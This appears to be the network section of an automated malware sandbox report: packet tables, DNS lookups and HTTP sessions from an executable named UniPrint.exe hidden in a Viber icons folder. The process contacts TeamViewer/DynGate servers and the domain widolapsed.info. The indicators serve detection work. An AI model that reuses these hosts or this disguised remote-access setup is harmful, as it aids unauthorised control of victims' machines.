                                                                                                                  Sep 15, 2021 14:02:04.262125015 CEST4976180192.168.2.4185.188.32.23
                                                                                                                  Sep 15, 2021 14:02:04.262177944 CEST4976180192.168.2.4185.188.32.23
                                                                                                                  Sep 15, 2021 14:02:04.266606092 CEST4976180192.168.2.4185.188.32.23
                                                                                                                  Sep 15, 2021 14:02:04.271028042 CEST4976280192.168.2.4185.188.32.23
                                                                                                                  Sep 15, 2021 14:02:04.287694931 CEST8049761185.188.32.23192.168.2.4
                                                                                                                  Sep 15, 2021 14:02:04.292336941 CEST8049762185.188.32.23192.168.2.4
                                                                                                                  Sep 15, 2021 14:02:04.292438030 CEST4976280192.168.2.4185.188.32.23
                                                                                                                  Sep 15, 2021 14:02:04.293028116 CEST4976280192.168.2.4185.188.32.23
                                                                                                                  Sep 15, 2021 14:02:04.314116955 CEST8049762185.188.32.23192.168.2.4
                                                                                                                  Sep 15, 2021 14:02:04.314212084 CEST4976280192.168.2.4185.188.32.23
                                                                                                                  Sep 15, 2021 14:02:04.327481985 CEST4976280192.168.2.4185.188.32.23
                                                                                                                  Sep 15, 2021 14:02:04.348402023 CEST8049762185.188.32.23192.168.2.4
                                                                                                                  Sep 15, 2021 14:02:04.348972082 CEST4976280192.168.2.4185.188.32.23
                                                                                                                  Sep 15, 2021 14:02:04.349881887 CEST4976280192.168.2.4185.188.32.23
                                                                                                                  Sep 15, 2021 14:02:04.372112036 CEST8049762185.188.32.23192.168.2.4
                                                                                                                  Sep 15, 2021 14:02:04.372143030 CEST8049762185.188.32.23192.168.2.4
                                                                                                                  Sep 15, 2021 14:02:04.372212887 CEST4976280192.168.2.4185.188.32.23
                                                                                                                  Sep 15, 2021 14:02:04.372248888 CEST4976280192.168.2.4185.188.32.23
                                                                                                                  Sep 15, 2021 14:02:04.372446060 CEST4976280192.168.2.4185.188.32.23
                                                                                                                  Sep 15, 2021 14:02:04.374186039 CEST4976380192.168.2.4185.188.32.23
                                                                                                                  Sep 15, 2021 14:02:04.393234015 CEST8049762185.188.32.23192.168.2.4
                                                                                                                  Sep 15, 2021 14:02:04.395155907 CEST8049763185.188.32.23192.168.2.4
                                                                                                                  Sep 15, 2021 14:02:04.395279884 CEST4976380192.168.2.4185.188.32.23
                                                                                                                  Sep 15, 2021 14:02:04.397053957 CEST4976380192.168.2.4185.188.32.23
                                                                                                                  Sep 15, 2021 14:02:04.418442011 CEST8049763185.188.32.23192.168.2.4
                                                                                                                  Sep 15, 2021 14:02:04.418550968 CEST4976380192.168.2.4185.188.32.23
                                                                                                                  Sep 15, 2021 14:02:04.422777891 CEST4976380192.168.2.4185.188.32.23
                                                                                                                  Sep 15, 2021 14:02:04.443669081 CEST8049763185.188.32.23192.168.2.4
                                                                                                                  Sep 15, 2021 14:02:04.443794012 CEST4976380192.168.2.4185.188.32.23
                                                                                                                  Sep 15, 2021 14:02:05.181092978 CEST4976380192.168.2.4185.188.32.23
                                                                                                                  Sep 15, 2021 14:02:05.202090025 CEST8049763185.188.32.23192.168.2.4
                                                                                                                  Sep 15, 2021 14:02:05.202183962 CEST4976380192.168.2.4185.188.32.23
                                                                                                                  Sep 15, 2021 14:02:05.202229977 CEST8049763185.188.32.23192.168.2.4
                                                                                                                  Sep 15, 2021 14:02:05.202305079 CEST4976380192.168.2.4185.188.32.23
                                                                                                                  Sep 15, 2021 14:02:05.265382051 CEST4976380192.168.2.4185.188.32.23
                                                                                                                  Sep 15, 2021 14:02:05.287209034 CEST8049763185.188.32.23192.168.2.4
                                                                                                                  Sep 15, 2021 14:02:05.304861069 CEST4976480192.168.2.4185.188.32.23
                                                                                                                  Sep 15, 2021 14:02:05.326276064 CEST8049764185.188.32.23192.168.2.4
                                                                                                                  Sep 15, 2021 14:02:05.326514006 CEST4976480192.168.2.4185.188.32.23
                                                                                                                  Sep 15, 2021 14:02:05.470541954 CEST4976480192.168.2.4185.188.32.23
                                                                                                                  Sep 15, 2021 14:02:05.504560947 CEST8049764185.188.32.23192.168.2.4
                                                                                                                  Sep 15, 2021 14:02:05.504858017 CEST4976480192.168.2.4185.188.32.23
                                                                                                                  Sep 15, 2021 14:02:05.885689974 CEST4976480192.168.2.4185.188.32.23
                                                                                                                  Sep 15, 2021 14:02:05.909208059 CEST8049764185.188.32.23192.168.2.4
                                                                                                                  Sep 15, 2021 14:02:05.910654068 CEST4976480192.168.2.4185.188.32.23
                                                                                                                  Sep 15, 2021 14:02:06.948101997 CEST4976480192.168.2.4185.188.32.23
                                                                                                                  Sep 15, 2021 14:02:06.972300053 CEST8049764185.188.32.23192.168.2.4
                                                                                                                  Sep 15, 2021 14:02:06.972657919 CEST8049764185.188.32.23192.168.2.4
                                                                                                                  Sep 15, 2021 14:02:06.972944975 CEST4976480192.168.2.4185.188.32.23
                                                                                                                  Sep 15, 2021 14:02:06.972968102 CEST4976480192.168.2.4185.188.32.23
                                                                                                                  Sep 15, 2021 14:02:07.001065016 CEST4976480192.168.2.4185.188.32.23
                                                                                                                  Sep 15, 2021 14:02:07.023164034 CEST8049764185.188.32.23192.168.2.4
                                                                                                                  Sep 15, 2021 14:02:07.178396940 CEST4976580192.168.2.4188.172.235.146
                                                                                                                  Sep 15, 2021 14:02:07.204675913 CEST8049765188.172.235.146192.168.2.4
                                                                                                                  Sep 15, 2021 14:02:07.204793930 CEST4976580192.168.2.4188.172.235.146
                                                                                                                  Sep 15, 2021 14:02:07.205918074 CEST4976580192.168.2.4188.172.235.146
                                                                                                                  Sep 15, 2021 14:02:07.232043982 CEST8049765188.172.235.146192.168.2.4
                                                                                                                  Sep 15, 2021 14:02:07.232136965 CEST4976580192.168.2.4188.172.235.146
                                                                                                                  Sep 15, 2021 14:02:07.235219002 CEST4976680192.168.2.4188.172.235.146
                                                                                                                  Sep 15, 2021 14:02:07.261502981 CEST8049766188.172.235.146192.168.2.4
                                                                                                                  Sep 15, 2021 14:02:07.261630058 CEST4976680192.168.2.4188.172.235.146
                                                                                                                  Sep 15, 2021 14:02:07.264987946 CEST4976680192.168.2.4188.172.235.146
                                                                                                                  Sep 15, 2021 14:02:07.265146017 CEST4976680192.168.2.4188.172.235.146
                                                                                                                  Sep 15, 2021 14:02:07.291261911 CEST8049766188.172.235.146192.168.2.4
                                                                                                                  Sep 15, 2021 14:02:07.291311979 CEST8049765188.172.235.146192.168.2.4
                                                                                                                  Sep 15, 2021 14:02:07.291441917 CEST4976580192.168.2.4188.172.235.146
                                                                                                                  Sep 15, 2021 14:02:07.292916059 CEST4976680192.168.2.4188.172.235.146
                                                                                                                  Sep 15, 2021 14:02:07.319358110 CEST8049765188.172.235.146192.168.2.4
                                                                                                                  Sep 15, 2021 14:02:07.319458008 CEST4976580192.168.2.4188.172.235.146
                                                                                                                  Sep 15, 2021 14:02:07.321544886 CEST4976680192.168.2.4188.172.235.146
                                                                                                                  Sep 15, 2021 14:02:07.348187923 CEST8049766188.172.235.146192.168.2.4
                                                                                                                  Sep 15, 2021 14:02:07.348217010 CEST8049765188.172.235.146192.168.2.4
                                                                                                                  Sep 15, 2021 14:02:07.348237038 CEST8049766188.172.235.146192.168.2.4
                                                                                                                  Sep 15, 2021 14:02:07.348290920 CEST4976580192.168.2.4188.172.235.146
                                                                                                                  Sep 15, 2021 14:02:07.348319054 CEST4976680192.168.2.4188.172.235.146
                                                                                                                  Sep 15, 2021 14:02:07.350502014 CEST4976580192.168.2.4188.172.235.146
                                                                                                                  Sep 15, 2021 14:02:07.350652933 CEST4976580192.168.2.4188.172.235.146
                                                                                                                  Sep 15, 2021 14:02:07.351424932 CEST4976680192.168.2.4188.172.235.146
                                                                                                                  Sep 15, 2021 14:02:07.376756907 CEST8049765188.172.235.146192.168.2.4
                                                                                                                  Sep 15, 2021 14:02:07.377854109 CEST8049766188.172.235.146192.168.2.4
                                                                                                                  Sep 15, 2021 14:02:07.377979040 CEST4976680192.168.2.4188.172.235.146
                                                                                                                  Sep 15, 2021 14:02:07.381102085 CEST4976580192.168.2.4188.172.235.146
                                                                                                                  Sep 15, 2021 14:02:07.381236076 CEST4976580192.168.2.4188.172.235.146
                                                                                                                  Sep 15, 2021 14:02:07.381417036 CEST4976580192.168.2.4188.172.235.146
                                                                                                                  Sep 15, 2021 14:02:07.407360077 CEST8049765188.172.235.146192.168.2.4
                                                                                                                  Sep 15, 2021 14:02:07.407394886 CEST8049766188.172.235.146192.168.2.4
                                                                                                                  Sep 15, 2021 14:02:07.407478094 CEST8049766188.172.235.146192.168.2.4
                                                                                                                  Sep 15, 2021 14:02:07.407478094 CEST4976680192.168.2.4188.172.235.146

                                                                                                                  UDP Packets

                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Sep 15, 2021 14:01:42.976789951 CEST6238953192.168.2.48.8.8.8
                                                                                                                  Sep 15, 2021 14:01:43.013367891 CEST53623898.8.8.8192.168.2.4
                                                                                                                  Sep 15, 2021 14:02:03.784799099 CEST4991053192.168.2.48.8.8.8
                                                                                                                  Sep 15, 2021 14:02:03.814250946 CEST53499108.8.8.8192.168.2.4
                                                                                                                  Sep 15, 2021 14:02:03.823643923 CEST5585453192.168.2.48.8.8.8
                                                                                                                  Sep 15, 2021 14:02:03.849232912 CEST53558548.8.8.8192.168.2.4
                                                                                                                  Sep 15, 2021 14:02:04.040373087 CEST6454953192.168.2.48.8.8.8
                                                                                                                  Sep 15, 2021 14:02:04.073539972 CEST53645498.8.8.8192.168.2.4
                                                                                                                  Sep 15, 2021 14:02:08.655509949 CEST6315353192.168.2.48.8.8.8
                                                                                                                  Sep 15, 2021 14:02:08.683300018 CEST53631538.8.8.8192.168.2.4
                                                                                                                  Sep 15, 2021 14:02:14.960760117 CEST5299153192.168.2.48.8.8.8
                                                                                                                  Sep 15, 2021 14:02:14.987684965 CEST53529918.8.8.8192.168.2.4
                                                                                                                  Sep 15, 2021 14:02:41.364280939 CEST5370053192.168.2.48.8.8.8
                                                                                                                  Sep 15, 2021 14:02:41.389894009 CEST53537008.8.8.8192.168.2.4
                                                                                                                  Sep 15, 2021 14:02:42.541956902 CEST5172653192.168.2.48.8.8.8
                                                                                                                  Sep 15, 2021 14:02:42.588336945 CEST53517268.8.8.8192.168.2.4
                                                                                                                  Sep 15, 2021 14:02:43.108805895 CEST5679453192.168.2.48.8.8.8
                                                                                                                  Sep 15, 2021 14:02:43.135267973 CEST53567948.8.8.8192.168.2.4
                                                                                                                  Sep 15, 2021 14:02:44.925611973 CEST5653453192.168.2.48.8.8.8
                                                                                                                  Sep 15, 2021 14:02:44.952585936 CEST53565348.8.8.8192.168.2.4
                                                                                                                  Sep 15, 2021 14:02:45.474016905 CEST5662753192.168.2.48.8.8.8
                                                                                                                  Sep 15, 2021 14:02:45.520349979 CEST53566278.8.8.8192.168.2.4
                                                                                                                  Sep 15, 2021 14:02:45.998174906 CEST5662153192.168.2.48.8.8.8
                                                                                                                  Sep 15, 2021 14:02:46.030580044 CEST53566218.8.8.8192.168.2.4
                                                                                                                  Sep 15, 2021 14:02:46.504812002 CEST6311653192.168.2.48.8.8.8
                                                                                                                  Sep 15, 2021 14:02:46.532043934 CEST53631168.8.8.8192.168.2.4
                                                                                                                  Sep 15, 2021 14:02:47.026256084 CEST6407853192.168.2.48.8.8.8
                                                                                                                  Sep 15, 2021 14:02:47.053766966 CEST53640788.8.8.8192.168.2.4
                                                                                                                  Sep 15, 2021 14:02:47.770863056 CEST6480153192.168.2.48.8.8.8
                                                                                                                  Sep 15, 2021 14:02:47.797616959 CEST53648018.8.8.8192.168.2.4
                                                                                                                  Sep 15, 2021 14:02:48.652941942 CEST6172153192.168.2.48.8.8.8
                                                                                                                  Sep 15, 2021 14:02:48.695420027 CEST53617218.8.8.8192.168.2.4
                                                                                                                  Sep 15, 2021 14:02:49.482099056 CEST5125553192.168.2.48.8.8.8
                                                                                                                  Sep 15, 2021 14:02:49.513088942 CEST53512558.8.8.8192.168.2.4
                                                                                                                  Sep 15, 2021 14:02:52.292789936 CEST6152253192.168.2.48.8.8.8
                                                                                                                  Sep 15, 2021 14:02:52.321297884 CEST53615228.8.8.8192.168.2.4
                                                                                                                  Sep 15, 2021 14:03:30.976747036 CEST5233753192.168.2.48.8.8.8
                                                                                                                  Sep 15, 2021 14:03:31.009324074 CEST53523378.8.8.8192.168.2.4
                                                                                                                  Sep 15, 2021 14:03:32.799874067 CEST5504653192.168.2.48.8.8.8
                                                                                                                  Sep 15, 2021 14:03:32.832097054 CEST53550468.8.8.8192.168.2.4

                                                                                                                  DNS Queries

                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                  Sep 15, 2021 14:02:03.784799099 CEST192.168.2.48.8.8.80xbed1Standard query (0)ping3.dyngate.comA (IP address)IN (0x0001)
                                                                                                                  Sep 15, 2021 14:02:03.823643923 CEST192.168.2.48.8.8.80xfb8bStandard query (0)ping3.dyngate.comA (IP address)IN (0x0001)
                                                                                                                  Sep 15, 2021 14:02:04.040373087 CEST192.168.2.48.8.8.80x4123Standard query (0)master13.teamviewer.comA (IP address)IN (0x0001)
                                                                                                                  Sep 15, 2021 14:02:08.655509949 CEST192.168.2.48.8.8.80x9803Standard query (0)widolapsed.infoA (IP address)IN (0x0001)

                                                                                                                  DNS Answers

                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                  Sep 15, 2021 14:02:03.814250946 CEST8.8.8.8192.168.2.40xbed1Name error (3)ping3.dyngate.comnonenoneA (IP address)IN (0x0001)
                                                                                                                  Sep 15, 2021 14:02:03.849232912 CEST8.8.8.8192.168.2.40xfb8bName error (3)ping3.dyngate.comnonenoneA (IP address)IN (0x0001)
                                                                                                                  Sep 15, 2021 14:02:04.073539972 CEST8.8.8.8192.168.2.40x4123No error (0)master13.teamviewer.com185.188.32.23A (IP address)IN (0x0001)
                                                                                                                  Sep 15, 2021 14:02:08.683300018 CEST8.8.8.8192.168.2.40x9803No error (0)widolapsed.info45.153.241.148A (IP address)IN (0x0001)

                                                                                                                  HTTP Request Dependency Graph

                                                                                                                  • widolapsed.info
                                                                                                                  • master13.teamviewer.com
                                                                                                                  • 188.172.235.146

                                                                                                                  HTTP Packets

                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  0192.168.2.44976745.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  1192.168.2.44983845.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  2192.168.2.44984345.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                                  TimestampkBytes transferredDirectionData


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  3192.168.2.449761185.188.32.2380C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Sep 15, 2021 14:02:04.163152933 CEST1208OUTGET /din.aspx?s=00000000&client=DynGate&rnd=991669640&p=10000001 HTTP/1.1
                                                                                                                  Accept: */*
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                  Host: master13.teamviewer.com
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Sep 15, 2021 14:02:04.184066057 CEST1208INHTTP/1.1 200 OK
                                                                                                                  Pragma: no-cache
                                                                                                                  Cache-control: no-cache, no-store
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  Content-length: 10
                                                                                                                  Data Raw: 17 24 34 32 30 34 37 31 34 35
                                                                                                                  Data Ascii: $42047145
                                                                                                                  Sep 15, 2021 14:02:04.214737892 CEST1208OUTGET /dout.aspx?s=42047145&p=10000001&client=DynGate&data=FyQSbQCjHqkys5MkoZ6YmBgcGRsZGpmckySiHpgTJqChnpg8MrGzGjExHByxGZkbr5kcmpsaHBgbGRsTJqSiHpg8MrGzGjExHByxGZkbr5kcmpsaHBgbGRsTJ6meq7S3GZcYmJMrHpialxgXGxwbkCip HTTP/1.1
                                                                                                                  Accept: */*
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  Content-Transfer-Encoding: binary
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                  Host: master13.teamviewer.com
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Sep 15, 2021 14:02:04.235718012 CEST1208INHTTP/1.1 200 OK
                                                                                                                  Pragma: no-cache
                                                                                                                  Cache-control: no-cache, no-store
                                                                                                                  Content-length: 0
                                                                                                                  Sep 15, 2021 14:02:04.241089106 CEST1209OUTGET /din.aspx?s=42047145&client=DynGate&p=10000002 HTTP/1.1
                                                                                                                  Accept: */*
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                  Host: master13.teamviewer.com
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Sep 15, 2021 14:02:04.262003899 CEST1209INHTTP/1.1 200 OK
                                                                                                                  Pragma: no-cache
                                                                                                                  Cache-control: no-cache, no-store
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  Content-length: 16
                                                                                                                  Data Raw: 17 24 13 0b 00 18 20 19 9c 98 98 1a 9b 9a 1a 9c
                                                                                                                  Data Ascii: $


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  4192.168.2.449762185.188.32.2380C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Sep 15, 2021 14:02:04.293028116 CEST1210OUTGET /din.aspx?s=00000000&client=DynGate&rnd=991669640&p=10000001 HTTP/1.1
                                                                                                                  Accept: */*
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                  Host: master13.teamviewer.com
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Sep 15, 2021 14:02:04.314116955 CEST1210INHTTP/1.1 200 OK
                                                                                                                  Pragma: no-cache
                                                                                                                  Cache-control: no-cache, no-store
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  Content-length: 10
                                                                                                                  Data Raw: 17 24 34 32 30 34 37 31 35 32
                                                                                                                  Data Ascii: $42047152
                                                                                                                  Sep 15, 2021 14:02:04.327481985 CEST1211OUTGET /dout.aspx?s=42047152&p=10000001&client=DynGate&data=FyQS8QAjHqmyuig6sTY0saWyvJMkoZ6YmBgcGRsZGpmckySiHpmcmJgam5oanBMmpKIemDwysbMaMTEcHLEZmRuvmRyamxocGBsZGxMrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAAFIAACkpoJiAAgAACIAAAH7LQs0qhaWs0MJjaOW1RZp/s+y/yn5XEbeVZg9sKBJ5zPw4VSW4zdwQ3dPOJPU35FNkIfcILZEzewXzbzR9HNSPt0dvZIMvjxebsFa8mt4yIfhUHNJCrU/eCKZvCgbkPO7XECRgFWPWpqy/DxavH2VA1uMNeC6MgWi1tqYJlUpU HTTP/1.1
                                                                                                                  Accept: */*
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  Content-Transfer-Encoding: binary
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                  Host: master13.teamviewer.com
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Sep 15, 2021 14:02:04.348402023 CEST1211INHTTP/1.1 200 OK
                                                                                                                  Pragma: no-cache
                                                                                                                  Cache-control: no-cache, no-store
                                                                                                                  Content-length: 0
                                                                                                                  Sep 15, 2021 14:02:04.349881887 CEST1211OUTGET /din.aspx?s=42047152&client=DynGate&p=10000002 HTTP/1.1
                                                                                                                  Accept: */*
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                  Host: master13.teamviewer.com
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Sep 15, 2021 14:02:04.372112036 CEST1211INHTTP/1.1 200 OK
                                                                                                                  Pragma: no-cache
                                                                                                                  Cache-control: no-cache, no-store
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  Content-length: 9
                                                                                                                  Data Raw: 17 24 13 04 00 98 20 27 a5
                                                                                                                  Data Ascii: $ '


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  5192.168.2.449763185.188.32.2380C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Sep 15, 2021 14:02:04.397053957 CEST1212OUTGET /din.aspx?s=00000000&client=DynGate&rnd=991669640&p=10000001 HTTP/1.1
                                                                                                                  Accept: */*
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                  Host: master13.teamviewer.com
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Sep 15, 2021 14:02:04.418442011 CEST1212INHTTP/1.1 200 OK
                                                                                                                  Pragma: no-cache
                                                                                                                  Cache-control: no-cache, no-store
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  Content-length: 10
                                                                                                                  Data Raw: 17 24 34 32 30 34 37 31 35 39
                                                                                                                  Data Ascii: $42047159
                                                                                                                  Sep 15, 2021 14:02:04.422777891 CEST1213OUTGET /dout.aspx?s=42047159&p=10000001&client=DynGate&data=FyQS9ACjHqmyuim0s7cwujq5MqWyvJMkoZ6YmBgcGRsZGpmckySiHpmcmJgam5oanBMmpKIemDwysbMaMTEcHLEZmRuvmRyamxocGBsZGxMrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAABIAACkpoJiAAgAACIAAABKJHDw2LgVxSDgQRZJcruSvmCif9Gt2TW3hKr1gLfUfE+41DTTEIjH9R8iP3LoBGOJ+mtJU9XCLVeH0PEI9syAw5y9+liHYCQSiHVEX/VS+caNKAiNEKBpchOIJAAICwW843p+TOKZHDFo8qX87SA1CKgBTr4AFtosrqQ/gO/pU HTTP/1.1
                                                                                                                  Accept: */*
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  Content-Transfer-Encoding: binary
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                  Host: master13.teamviewer.com
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Sep 15, 2021 14:02:04.443669081 CEST1213INHTTP/1.1 200 OK
                                                                                                                  Pragma: no-cache
                                                                                                                  Cache-control: no-cache, no-store
                                                                                                                  Content-length: 0
                                                                                                                  Sep 15, 2021 14:02:05.181092978 CEST1213OUTGET /din.aspx?s=42047159&client=DynGate&p=10000002 HTTP/1.1
                                                                                                                  Accept: */*
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                  Host: master13.teamviewer.com
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Sep 15, 2021 14:02:05.202090025 CEST1214INHTTP/1.1 200 OK
                                                                                                                  Pragma: no-cache
                                                                                                                  Cache-control: no-cache, no-store
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  Content-length: 9
                                                                                                                  Data Raw: 17 24 13 04 00 98 20 27 a5
                                                                                                                  Data Ascii: $ '


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  6192.168.2.449764185.188.32.2380C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Sep 15, 2021 14:02:05.470541954 CEST1214OUTGET /din.aspx?s=00000000&client=DynGate&rnd=279943160&p=10000001 HTTP/1.1
                                                                                                                  Accept: */*
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                  Host: master13.teamviewer.com
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Sep 15, 2021 14:02:05.504560947 CEST1214INHTTP/1.1 200 OK
                                                                                                                  Pragma: no-cache
                                                                                                                  Cache-control: no-cache, no-store
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  Content-length: 10
                                                                                                                  Data Raw: 17 24 34 32 30 34 37 32 32 34
                                                                                                                  Data Ascii: $42047224
                                                                                                                  Sep 15, 2021 14:02:05.885689974 CEST1215OUTGET /dout.aspx?s=42047224&p=10000001&client=DynGate&data=FyQS6wChtjSytzoeqisoqZMjHqY3s7S3EyOrnpgTI6umMrsyth6aGBgTJDSyMqe3NjS3Mqm6MLo6uZ6YEyQqKignqqoemRMkoZ6YmBgcGRsZGpmckySiHpmcmJgam5oanBMlsrK4MLY0uzKemJMmMLczurCzsp61MJMmNLGytzmyqjy4Mp6YEyakoh6YPDKxsxoxMRwcsRmZG6+ZHJqbGhwYGxkbEyc3p7Mgsbo0uzKlsrK4MLY0uzKemBMpOrc6NLaynpqTKbq4ODe5OjKyIzKwujq5MrmemJMqIagnqqoemBMrHpialxgXGxwbkCip HTTP/1.1
                                                                                                                  Accept: */*
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  Content-Transfer-Encoding: binary
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                  Host: master13.teamviewer.com
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Sep 15, 2021 14:02:05.909208059 CEST1215INHTTP/1.1 200 OK
                                                                                                                  Pragma: no-cache
                                                                                                                  Cache-control: no-cache, no-store
                                                                                                                  Content-length: 0
                                                                                                                  Sep 15, 2021 14:02:06.948101997 CEST1216OUTGET /din.aspx?s=42047224&client=DynGate&p=10000002 HTTP/1.1
                                                                                                                  Accept: */*
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                  Host: master13.teamviewer.com
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Sep 15, 2021 14:02:06.972300053 CEST1216INHTTP/1.1 200 OK
                                                                                                                  Pragma: no-cache
                                                                                                                  Cache-control: no-cache, no-store
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  Content-length: 413
                                                                                                                  Data Raw: 17 24 13 98 01 98 20 27 a5 af 98 98 18 18 18 2f 96 af 99 2f af 98 9c 1c 17 18 9b 99 17 19 19 9a 97 18 9a 1b 1d 1c 18 2f 99 98 9b 9a 19 af 98 af 96 98 af 98 17 18 17 18 17 18 2f af 98 9c 1a 97 18 9c 1c 17 19 99 17 19 99 af 98 9c 1a 97 18 9c 1c 17 19 99 17 19 19 af 98 2f 99 9c 98 98 1a 9b 9a 1a 9c 2f 98 af 98 2f 98 2f 98 2f 98 9c 9a 19 9b 9c 9b 9b 19 1a af af 98 9c 1c 17 1b 1a 97 1b 9b 17 18 9a 18 96 18 9c 1c 17 18 9b 99 17 19 1a 1b 17 18 9b 98 96 19 9b 97 19 1a 99 17 19 1a 1b 97 18 98 1c 96 18 9c 1c 17 18 9b 99 17 19 18 99 97 1b 99 16 18 9c 1c 17 18 9b 99 17 19 19 9a 97 18 9a 1b 16 19 18 99 97 19 19 1b 97 18 9b 1c 17 18 9a 1a 96 1c 9a 17 18 9b 17 1b 17 18 9b 9a 16 18 9c 1c 17 18 9b 99 17 19 1a 1a 97 18 9a 18 96 19 18 99 97 19 19 1b 97 18 9b 19 97 18 99 9b 96 18 9c 1c 17 18 9b 99 17 18 9c 9c 17 18 99 99 96 18 9a 9c 17 18 9b 9b 17 1c 1b 17 1b 96 19 9b 97 19 1a 99 17 19 19 99 17 18 98 19 96 18 9b 9c 17 19 1a 9a 97 18 9a 9a 97 18 9b 9a 96 18 9a 9c 97 18 99 19 17 18 9c 19 17 19 18 1c 96 19 18 9b 97 18 9a 1b 17 19 18 97 18 99 9a 16 18 9c 1c 17 18 9b 99 17 19 19 19 97 18 98 99 96 19 18 9b 97 18 9a 1b 17 18 99 97 18 99 9b 16 19 9b 97 19 1a 99 17 19 19 1a 17 1b 1c af b2 b3 17 b1 31 98 33 9a a1 a4 b4 26 36 a8 18 21 a0 a0 a0 a0 af
                                                                                                                  Data Ascii: $ '/////////13&6!


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  7192.168.2.449765188.172.235.14680C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Sep 15, 2021 14:02:07.205918074 CEST1217OUTGET /din.aspx?s=00000000&m=fast&client=DynGate&rnd=975066281&p=10000001 HTTP/1.1
                                                                                                                  Accept: */*
                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                  Host: 188.172.235.146
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Sep 15, 2021 14:02:07.232043982 CEST1217INHTTP/1.1 200 OK
                                                                                                                  Pragma: no-cache
                                                                                                                  Cache-control: no-cache, no-store
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  Content-length: 17
                                                                                                                  Data Raw: 17 24 66 61 73 74 31 32 32 35 31 32 36 37
                                                                                                                  Data Ascii: $fast12251267
